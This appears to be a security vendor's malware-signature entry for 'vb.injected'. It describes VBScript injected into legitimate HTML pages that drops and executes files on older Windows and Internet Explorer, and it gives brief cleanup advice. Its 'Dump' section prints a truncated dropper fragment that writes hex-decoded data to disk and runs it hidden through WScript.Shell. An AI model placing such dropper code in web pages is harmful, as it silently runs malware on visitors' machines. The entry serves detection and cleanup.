Malware Signatures

  1. Home
  2. Malware Signatures
  3. vb.injected

vb.injected

VBScript malwares are usually written to act as an accomplice to other malicious code, dropping and executing other files in the Windows enviromnent. It mostly targeting older versions Internet Explorer browser.
Cybercriminals inject malicious VB script into legitimate HTML web pages. Use of VBscript allows web pages to interact directly with Windows OS, for example via Windows Script Host (windows scripting engine) which allows execution
of malicious code on computers with older version of Windows.

Affecting

Any websites.

Cleanup

Check integrity of your files. Also, you can sign up with us and let our team remove the malware for you.

Dump


<SCRIPT Language=VBScript><!--
....
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>...